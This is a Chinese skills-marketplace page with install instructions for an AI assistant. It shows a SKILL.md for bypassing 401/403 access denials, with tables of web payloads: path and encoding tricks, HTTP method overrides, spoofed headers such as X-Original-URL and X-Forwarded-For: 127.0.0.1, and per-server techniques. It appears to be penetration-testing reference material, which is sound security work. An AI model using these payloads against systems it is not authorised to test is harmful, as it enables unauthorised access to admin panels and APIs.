用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/wgpsec/AboutSecurity --skill 401-403-bypass命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
基于 SOC 职业分类
正在显示 SKILL.md
| name | 401-403-bypass |
| description | 401/403 访问拒绝绕过方法论。当遇到管理后台、API 端点返回 401/403 Forbidden 时使用。覆盖路径操纵、HTTP 方法篡改、Header 注入、协议降级、组合攻击 |
| metadata | {"tags":"403,401,bypass,forbidden,绕过,路径操纵,method override,X-Original-URL,X-Forwarded-For,access control,权限绕过","category":"exploit"} |
核心思路:反向代理/WAF 检查一种路径格式,但后端做了不同的路径规范化。
遇到 401/403?
├── 1. 路径操纵(成功率最高)
│ ├── /path/ → /PATH → /path%20 → /./path → //path
│ ├── /path;x → /path..;/ → /%2e/path → /path%00
│ └── 200?→ 绕过成功
├── 2. 方法绕过
│ ├── POST/PUT/PATCH/DELETE/OPTIONS/HEAD
│ ├── X-HTTP-Method-Override: PUT
│ └── PROPFIND/自定义方法
├── 3. Header 绕过
│ ├── X-Original-URL: /path(Nginx/IIS)
│ ├── X-Forwarded-For: 127.0.0.1(IP 白名单)
│ └── Referer/Origin/Host 伪造
├── 4. 协议绕过
│ └── HTTP/1.0
├── 5. 组合攻击
│ └── Method + Path + Header 三合一
├── 全部失败 → 其他思路
│ ├── 请求走私 → cache-poisoning-smuggling
│ ├── SSRF → ssrf-methodology
│ ├── IDOR → idor-methodology
│ └── 认证逻辑 → privilege-escalation-web
└── 自动化扫描 byp4xx / 403bypasser
| 技巧 | 示例 |
|---|---|
| 尾部斜杠/点 | /admin/ /admin/. |
| 大小写 | /Admin /ADMIN |
| URL 编码 | /%61dmin /admi%6e |
| 双重编码 | /%2561dmin |
| Unicode 过长编码 | /admi%C0%AE |
| 点段/路径穿越 | /./admin //admin |
| NULL 字节 | /admin%00 /admin%00.json |
| 路径参数 (Tomcat) | /admin;foo /;/admin |
| 反斜杠 (IIS) | /admin\ |
| 技巧 | 示例 |
|---|---|
| 方法切换 | POST /admin PUT /admin |
| Method Override | X-HTTP-Method-Override: PUT |
| URL 重写 | X-Original-URL: /admin |
| IP 伪造 | X-Forwarded-For: 127.0.0.1 |
| 协议降级 | GET /admin HTTP/1.0 |
| 服务器 | 关键技巧 |
|---|---|
| Apache | /admin/(尾部斜杠), /.admin(点前缀) |
| Nginx | /Admin(大小写), X-Original-URL |
| IIS/ASP.NET | /admin;.css, /admin\, /admin::$DATA |
| Tomcat/Java | /admin;foo, /admin..;/, /;/admin |
| Spring | /admin.anything(旧版后缀匹配) |
完整 payload 列表见 references 文件